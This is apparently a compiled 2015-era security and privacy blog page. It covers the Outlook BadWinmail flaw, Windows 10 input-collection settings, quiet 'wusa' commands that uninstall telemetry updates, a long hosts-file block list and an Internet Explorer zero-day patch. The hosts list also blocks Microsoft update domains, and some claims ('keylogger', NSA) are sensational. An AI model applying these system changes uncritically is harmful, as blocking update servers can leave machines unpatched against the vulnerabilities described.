Savez-vous pourquoi les cybercriminels adorent tellement Flash ? Parce que Flash comporte beaucoup de vulnĂ©rabilitĂ©s. Certains de ces bogues jour zĂ©ro, ce qui signi-fie qu’ils ne sont pas corrigĂ©s. Ces vulnĂ©rabilitĂ©s peuvent ĂȘtre exploitĂ©s pour faire des choses que votre PC n’apprĂ©ciera certainement pas.

C’est un problĂšme trĂšs connu et, pour lutter contre celui-ci, de nombreux dĂ©veloppeurs utilisent la mĂȘme mĂ©thode simple : ils n’autorisent le continu Flash Ă  fonctionner dans leurs logiciels (par exemple les navigateurs) que dans ce qu’on appelle des  » bacs Ă  sable « . Le code malveillant peut faire ce qu’il veut dans ces bacs Ă  sable, mĂȘme lancer une cyberapocalypse !

L’idĂ©e c’est qu’il ne puisse pas s’échapper du bac Ă  sable et ne puisse donc rien affecter hors de celui-ci pour que vos fichiers ne soient pas corrompus. Cette mĂ©thode est tout du moins conçue ainsi ; parfois, le truc ne marche pas, mais c’est encore une autre histoire. Le cas qui nous occupe n’a rien Ă  voir avec cela.

Vous attendez la suite pour comprendre quelle est la vulnĂ©rabilitĂ© d’Outlook ? C’est parti ! En fait, Outlook n’utilise pas ce type de bacs Ă  sable pour les objets potentiellement dangereux et exĂ©cute tout en mode normal. Cela signifie que le code malveillant des objets intĂ©grĂ©s peut agir comme n’importe quel autre logiciel installĂ© sur votre PC.

Et il n’y a pas que cela ! Outlook est si obligeant qu’il ouvre l’e-mail le plus rĂ©cent avant que vous ne le fassiez ! Ainsi, si un e-mail malveillant avec un programme BadWinmail est le dernier e-mail Ă  ĂȘtre arrivĂ© dans votre boĂźte de rĂ©ception, il est exĂ©cutĂ© immĂ©diatement lorsque vous dĂ©marrez Outlook.

Le chercheur en sĂ©curitĂ© Haifei Li, qui a dĂ©couvert le bug, a crĂ©Ă© des preuves du concept d’une attaque possible qui exploiterait la vulnĂ©rabilitĂ© BadWinmail, comme il l’a appelĂ©e. Il le dĂ©crit avec des mots Ă©tonnamment simples dans sa recherche.

Il a mĂȘme crĂ©Ă© cette vidĂ©o relativement courte qui explique parfaitement l’idĂ©e centrale du fonc-tionnement de cette vulnĂ©rabilitĂ©.

Pour comprendre Ă  quel point cela peut ĂȘtre nocif, imaginez qu’un criminel, au lieu d’ouvrir l’innocente application de Calculatrice, exĂ©cute un ransomware sur votre PC.

La bonne nouvelle, c’est que Haifei Li a signalĂ© ce bug Ă  Microsoft, et que la sociĂ©tĂ© a rĂ©solu ce problĂšme le 8 dĂ©cembre. La mauvaise, c’est que les personnes qui n’ont pas l’habitude de mettre Ă  jour leur logiciel rĂ©guliĂšrement ont encore cette vulnĂ©rabilitĂ©. Et certains d’entre eux la garderont pendant des semaines, des mois ou mĂȘme des annĂ©es.

Maintenant que le rapport a Ă©tĂ© publiĂ© pour le grand public, de nombreux cybercriminels vont essayer d’utiliser cette vulnĂ©rabilitĂ© pour infecter des milliers, voir des millions de PC. Si vous vous ĂȘtes un jour demandĂ© pourquoi il est si important de toujours mettre vos logiciels Ă  jour immĂ©diatement et d’utiliser un logiciel de sĂ©curitĂ©, je crois que vous avez dĂ©-sormais la rĂ©ponse Ă  cette question.

Source: https://blog.kaspersky.fr/badwinmail/5087/

Turn off Windows 10’s Keylogger

Do you know? Microsoft has the power to track every single word you type or say to its digital assistant Cortana while using its newest operating system, Windows 10.
Last fall, we reported about a keylogger‘ that Microsoft openly put into its Windows 10 Technical Preview saying the company ‘may collect voice information’ as well as ‘typed characters.’
It was thought that the company would include the keylogger only within the Technical Preview of Windows 10, just for testing purpose. But, the thought was Wrong!
The keylogger made its ways to Windows 10 public release offered by Microsoft for free due to which Windows 10 gained millions of adoption in just a few days after its first roll out back in July – but the free upgrade is not always free.
Yes, besides various privacy issues, there is a software component that tracks your inputs using your keyboard, voice, screen, mouse, and stylus, however, it is a bit more complicated than you thought.

Windows 10’s Keylogger is More than Just a Keylogger

The component is not actually a keylogger in terms of malware.
It is more than that, as Microsoft openly says


“When you interact with your Windows device by speaking, [handwriting], or typing, Microsoft collects speech, inking, and typing information – including information about your Calendar and People [contacts]
”

If that makes you feel creepy then need not to worry, because the good news is — You can Turn Off this Keylogger.

Here’s How You can Turn Off the Keylogger

  • Click on the Start Menu, then open Settings.
  • Click on Privacy settings, which you’ll find in the very last row of the menu.
  • Once you are in the Privacy menu, click on General
  • Under ‘Send Microsoft info about how I write to help use improve typing and writing in the future‘ – Turn it to Off.
  • Now move ahead to the ‘Speech, Inking and Typing’ menu and click Stop getting to know me. This will help you turn off the speech tracking through dictation or Cortana.
privacy-settings-windows10
privacy-settings-windows10-voice

Due to several privacy issues built into Windows 10, Microsoft has gained a bad reputation.

First seen on : http://thehackernews.com/2015/09/windows10-keylogger-security.html

Retirer Window 7 et 8 tracking

Voici le détail des patchs a retirer, la, maintenant, tout de suite:

KB3068708 This update introduces the Diagnostics and Telemetry tracking service to existing devices. By applying this service, you can add benefits from the latest version of Windows to systems that have not yet upgraded. The update also supports applications that are subscribed to Visual Studio Application Insights.

KB3022345 (replaced by KB3068708) This update introduces the Diagnostics and Telemetry tracking service to in-market devices. By applying this service, you can add benefits from the latest version of Windows to systems that have not yet been upgraded. The update also supports applications that are subscribed to Visual Studio Application Insights.

KB3075249 This update adds telemetry points to the User Account Control (UAC) feature to collect information on elevations that come from low integrity levels.

KB3080149 This package updates the Diagnostics and Telemetry tracking service to existing devices. This service provides benefits from the latest version of Windows to systems that have not yet upgraded. The update also supports applications that are subscribed to Visual Studio Application Insights.

Pour les désinstaller, lancez une invite de commande en Administrateur, et entrez les commandes suivantes :

  • wusa /uninstall /kb:3068708 /quiet /norestart
  • wusa /uninstall /kb:3022345 /quiet /norestart
  • wusa /uninstall /kb:3075249 /quiet /norestart
  • wusa /uninstall /kb:3080149 /quiet /norestart

Pour les bloquer définitivement, allez dans la liste des mises à jour Windows Update et faites un clic droit / masquer la mise à jour.

masquer

 

Voila.

 

 

First seen on http://korben.info/windows-7-et-8-le-tracking-vous-concerne-aussi.html

Bloquer l’espionnage de Windows

Dans c:\Windows\System32\drivers\etc\

Ouvrir le fichier hosts en mode administrateur avec Notepad et rajouter toutes ces lignes:

0.0.0.0 a-0001.a-msedge.net
0.0.0.0 a-0002.a-msedge.net
0.0.0.0 a-0003.a-msedge.net
0.0.0.0 a-0004.a-msedge.net
0.0.0.0 a-0005.a-msedge.net
0.0.0.0 a-0006.a-msedge.net
0.0.0.0 a-0007.a-msedge.net
0.0.0.0 a-0008.a-msedge.net
0.0.0.0 a-0009.a-msedge.net
0.0.0.0 a-msedge.net
0.0.0.0 a.ads1.msn.com
0.0.0.0 a.ads2.msads.net
0.0.0.0 a.ads2.msn.com
0.0.0.0 a.rad.msn.com
0.0.0.0 ac3.msn.com
0.0.0.0 ad.doubleclick.net
0.0.0.0 adnexus.net
0.0.0.0 adnxs.com
0.0.0.0 ads.msn.com
0.0.0.0 ads1.msads.net
0.0.0.0 ads1.msn.com
0.0.0.0 aidps.atdmt.com
0.0.0.0 aka-cdn-ns.adtech.de
0.0.0.0 az361816.vo.msecnd.net
0.0.0.0 az512334.vo.msecnd.net
0.0.0.0 b.ads1.msn.com
0.0.0.0 b.ads2.msads.net
0.0.0.0 b.rad.msn.com
0.0.0.0 bs.serving-sys.com
0.0.0.0 c.atdmt.com
0.0.0.0 c.msn.com
0.0.0.0 cdn.atdmt.com
0.0.0.0 cds26.ams9.msecn.net
0.0.0.0 choice.microsoft.com
0.0.0.0 choice.microsoft.com.nsatc.net
0.0.0.0 compatexchange.cloudapp.net
0.0.0.0 corp.sts.microsoft.com
0.0.0.0 corpext.msitadfs.glbdns2.microsoft.com
0.0.0.0 cs1.wpc.v0cdn.net
0.0.0.0 db3aqu.atdmt.com
0.0.0.0 df.telemetry.microsoft.com
0.0.0.0 diagnostics.support.microsoft.com
0.0.0.0 ec.atdmt.com
0.0.0.0 feedback.microsoft-hohm.com
0.0.0.0 feedback.search.microsoft.com
0.0.0.0 feedback.windows.com
0.0.0.0 flex.msn.com
0.0.0.0 g.msn.com
0.0.0.0 h1.msn.com
0.0.0.0 i1.services.social.microsoft.com
0.0.0.0 i1.services.social.microsoft.com.nsatc.net
0.0.0.0 lb1.www.ms.akadns.net
0.0.0.0 live.rads.msn.com
0.0.0.0 m.adnxs.com
0.0.0.0 msedge.net
0.0.0.0 msftncsi.com
0.0.0.0 msnbot-65-55-108-23.search.msn.com
0.0.0.0 msntest.serving-sys.com
0.0.0.0 oca.telemetry.microsoft.com
0.0.0.0 oca.telemetry.microsoft.com.nsatc.net
0.0.0.0 pre.footprintpredict.com
0.0.0.0 preview.msn.com
0.0.0.0 rad.live.com
0.0.0.0 rad.msn.com
0.0.0.0 redir.metaservices.microsoft.com
0.0.0.0 schemas.microsoft.akadns.net
0.0.0.0 secure.adnxs.com
0.0.0.0 secure.flashtalking.com
0.0.0.0 settings-sandbox.data.microsoft.com
0.0.0.0 settings-win.data.microsoft.com
0.0.0.0 sls.update.microsoft.com.akadns.net
0.0.0.0 sqm.df.telemetry.microsoft.com
0.0.0.0 sqm.telemetry.microsoft.com
0.0.0.0 sqm.telemetry.microsoft.com.nsatc.net
0.0.0.0 static.2mdn.net
0.0.0.0 statsfe1.ws.microsoft.com
0.0.0.0 statsfe2.ws.microsoft.com
0.0.0.0 telecommand.telemetry.microsoft.com
0.0.0.0 telecommand.telemetry.microsoft.com.nsatc.net
0.0.0.0 telemetry.appex.bing.net
0.0.0.0 telemetry.microsoft.com
0.0.0.0 telemetry.urs.microsoft.com
0.0.0.0 vortex-bn2.metron.live.com.nsatc.net
0.0.0.0 vortex-cy2.metron.live.com.nsatc.net
0.0.0.0 vortex-sandbox.data.microsoft.com
0.0.0.0 vortex-win.data.microsoft.com
0.0.0.0 vortex.data.microsoft.com
0.0.0.0 watson.live.com
0.0.0.0 www.msftncsi.com
0.0.0.0 ssw.live.com
0.0.0.0 fe2.update.microsoft.com.akadns.net
0.0.0.0 reports.wes.df.telemetry.microsoft.com
0.0.0.0 s0.2mdn.net
0.0.0.0 services.wes.df.telemetry.microsoft.com
0.0.0.0 statsfe2.update.microsoft.com.akadns.net
0.0.0.0 survey.watson.microsoft.com
0.0.0.0 view.atdmt.com
0.0.0.0 watson.microsoft.com
0.0.0.0 watson.ppe.telemetry.microsoft.com
0.0.0.0 watson.telemetry.microsoft.com
0.0.0.0 watson.telemetry.microsoft.com.nsatc.net
0.0.0.0 wes.df.telemetry.microsoft.com
0.0.0.0 ui.skype.com
0.0.0.0 pricelist.skype.com
0.0.0.0 apps.skype.com
0.0.0.0 m.hotmail.com
0.0.0.0 s.gateway.messenger.live.com

Rebooter et voila, plus aucune info n’ira chez Microsoft TSA de la NSA.

 

First seen on : http://e-maxx.eu/bloquer-lespionnage-de-windows/

Microsoft pushes Emergency Patch for Zero-Day Internet Explorer Flaw Tuesday

Microsoft pushes Emergency Patch for Zero-Day Internet Explorer Flaw
It’s time to immediately patch your Internet Explorer – Once again!
Microsoft has issued an emergency out-of-band patch for all supported versions of Internet Explorer browser, to fix a critical security flaw that hackers are actively exploiting to hijack control of targeted computers.
The Zero-Day flaw (assigned CVE-2015-2502) is a Remote Code Execution vulnerability that could be exploited when a user visits a booby-trapped website or open a malicious email on an affected machine.
The security bug actually resides in the way Internet Explorer handles objects in memory. If successfully exploited, a hacker could gain the same user privileges as the current user.
Therefore, users running administrator accounts on their machines as well as systems where IE is frequently used, like workstations or terminal servers, are particularly at the most risk from this vulnerability.

Critical Zero-Day Vulnerability

“An attacker who successfully exploited this vulnerability could take complete control of an affected system,” Microsoft officials wrote in an advisory posted Tuesday. An attacker could then:
  • Install malicious programs
  • View, Change, or Delete data
  • Create new accounts with full user rights
  • Many more…
In simple words, this zero-day vulnerability could allow an attacker to take over the affected Windows machine. According to the company, the flaw has been publicly exploited.

Affected Software

The zero-day flaw affects all supported versions of Microsoft’s Internet Explorer, from IE7 to IE 11 which runs on the recently released Windows 10. However, Microsoft’s new Edge browser is not affected.
The vulnerability gains Microsoft’s top severity of ‘Critical’ for all desktop versions of Windows. The company credited its security engineer Clement Lecigne to report the bug.
Users and administrators are advised to install the update as soon as possible. Windows users may also find some protection mechanism using the Enhanced Mitigation Experience Toolkit (EMET) that helps prevent vulnerabilities in software from being successfully exploited.